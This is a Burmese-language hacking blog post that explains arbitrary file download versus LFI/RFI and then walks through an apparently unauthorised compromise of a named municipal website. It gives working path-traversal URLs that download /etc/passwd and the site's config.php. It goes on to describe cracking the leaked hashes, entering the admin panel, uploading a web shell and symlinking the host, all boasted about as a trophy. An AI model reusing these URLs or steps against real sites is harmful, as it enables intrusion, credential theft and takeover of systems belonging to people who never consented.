Arbitrary File download vulnerability နဲ ့ LFI/RFI က ရုတ္ရက္ျကည့္ရင္ ဆင္တူယိုးမွာနဲ ့မုိ ့ တခါတေလ ေရာေထြးတတ္ပါတယ္. ဒါေပမယ့္ exploit ဆက္လက္ျပ ုလုပ္သြားနိုင္ပံုခ်င္းေတာ့ မတူပါဖူး.
What is Arbitrary File download Vulnerability?
Web application server တစ္ခုဟာ user တစ္ေယာက္ request လုပ္တဲ့ file type ကို filter မလုပ္ထားမိရင္ဒီလိုမ်ိ ုး အေျခအေနမွာ any user က ဒီ server ရဲ ့ အေရးျကီးတဲ့ ဖိုင္ေတြ (eg../../etc/passwd or ../../etc/shadow etc .. ) ကို download ဆြဲယူျပီး sensitive information ေတြရယူသြားနိုင္ပါတယ္. ဒီ Arbitrary File download vul: ကို ေအာက္မွာ live hostတစ္ခုနဲ ့အဆင့္ဆင့္ေဖာက္ျပသြားပံုပါ ျပထားပါမယ္. ေအာက္မွာဆက္ျကည့္ျကေပါ့.
What is LFI & RFI?
ဒီေနရာမွာ LFI RFI အေျကာင္းကို အက်ယ္တဝင့္မရွင္းျပေတာ့ပါဖူး. Arbitrary File download နဲ ့ကြာပံုေလးပဲေျပာျပသြားမွာပါ. သူလည္းပဲ အေပါကလိုပဲ web app: server က path transverse<directory tranverse> နဲ ့sensitive file ေတြကို access ရမွာပါ. LFI (local file inclusion) RFI(remote file inclusion) vulnerability. Web app: server က user input parameter ကို unfiltered မိတဲ့အခါမွာ LFI ဆိုရင္ local file ေတြကို path transverse ကေနျကည့္သလိုု RFI ကေတာ့ remote malicious host တစ္ခုခုက file ေတြကို Urls ေတြနဲ ့ ဆြဲယူသံုးစြဲတာပါ. (both take advantage by unfiltered user input parameter). အိုေက ဒီေလာက္ဆို သေဘာေလးေတြ ကြဲကြဲျပားျပားသိေလာက္ပီထင္ပါတယ္. LFI RFI predominent ျဖစ္တာက php web application မွာအျဖစ္မ်ားပါတယ္.
အလြယ္ ေျပာရရင္ေတာ့ RFI/LFI က local web server application မွာ include() လုပ္ျပီး furthur exploitation (eg အေနနဲ ့ တစ္ခုေျပာပါမယ္, file inclusion ကေန writable log file ကို access လုပ္ျပီး code execute လုပ္ျပီး host ေပါမွာ shell upload တင္လို ့ရသလိုေပါ့ ) ဆက္လုပ္လို ့ရပါတယ္.
Arbitrary File download ကေတာ့ download ဆိုတဲ့အတိုင္း ျပီးမွ file view ျပီး ျကည့္ယံုတင္ေပါ့
Ok ဒါဆို ဆက္ဆြဲျကရေအာင္. ေအာက္မွာ arbitrary file download vul ဆိုက္ဒ္ေလးတစ္ခုနဲ ့ အဆင့္ဆင့္ ေဖာက္ျပသြားမွာပါ.
[ အမွန္မွန္ ရွာတာက whmcs xploit ဟိီး .. ထြက္လာတာကို စမ္းမိတာက ဒလို ]
url ကိုျကည့္လိုက္ပါတယ္. ရနိုင္ေလာက္လားေပါ့ … ဒီလိုေလး
http://www.cityofindustry.org/scripts/dl.php?f=../uploads/files/specialevent.pdf
ျပီးေတာ့ စမ္းျကည့္ပါတယ္. /etc/passwd ဖိုင္ကို path transverse ကေန ရမရဆိုတာ..
Ok ေတြ ့တယ္မလား file size (7.5 KB) ေသခ်ာတယ္ ပါလာပီ sensitive information ေတြ
BooM!
http://www.cityofindustry.org/scripts/dl.php?f=/etc/passwd
eg few lines:
ျပီးေတာ့ က်ေနာ္ ထပ္ျပီး ေလ့လာပါတယ္. server ပိုင္းကို ဆက္မျကည့္ေတာ့ပဲ .. ဒီဆိုက္ဒ္ရဲ ့ config connect ပိုင္းကို ဆက္ ျကည့္ပါတယ္.
http://www.cityofindustry.org/configs.php
Error File Not Found ဆိုေတာ့ အဲ့တာမဟုတ္ေသးဖူး.. ဆက္ျကည့္ပါတယ္
ျဖစ္နိုင္တဲ့ /include/ or /includes/ အစရွိသျဖင့္ config ထားတတ္တဲ့ path ေတြတစ္ခုခ်င္းစီလိုက္စစ္ပါတယ္. ေတြ ့ပါျပီး
http://www.cityofindustry.org/include/ မွာ config.php ဖိုင္. နွိပ္ျကည့္ပါတယ္.
ဟားဟား ကံကေကာင္းျပီးရင္းေကာင္းပါပဲ path disclosure ကိုပါျပေနပါတယ္. ဒါဆိုေအးေဆး config ဆီကို arbitrary file download vulnerability နဲ ့ download ခ်ပလိုက္ယံုပဲ.. ဒါဆို config ကို ဒီလိုေလး download ခ်ပါတယ္.
http://www.cityofindustry.org/scripts/dl.php?f=/home/coi/public_html/include/config.php
Ok config ရပါျပီ ..
hash ေတြကို online md5 hash cracker ေတြနဲ ့တိုက္စစ္ျကည့္ပါတယ္. ရပါတယ္ ခင္ဗ်ာ…
< admin panel ဘယ္မွာလဲ ဆိုတာ မေျပာျပေတာ့ဖူး… ကိုယ့္ဘာသာ logic နဲ ့ ဆိုက္ဒ္ တည္ေဆာက္ပံု page ယူသံုးတာကို ျကည့္လိုက္ရင္ လြယ္လြယ္ေလးပါ that’s your turn
Ok ေတြ ့တယ္ ့ေနာ္ အထဲမွာ ေမာင္ဒုတ္ ေရာက္ေနပီ Lol … ျပီးေတာ့ အားလံုးသိျကတဲ့အတိုင္း file upload ေနရာကေန shell upload တင္ျပီး site control ရယူလိုက္ပါတယ္.
proof:
ျပီးေတာ့ ဒီ host က easily symlink လုပ္လို ့ ျဖစ္ပါတယ္.
proof:
[>] – Have Fun Sexy
[>] - Ref : http://dongoth.com/





0 comments:
Post a Comment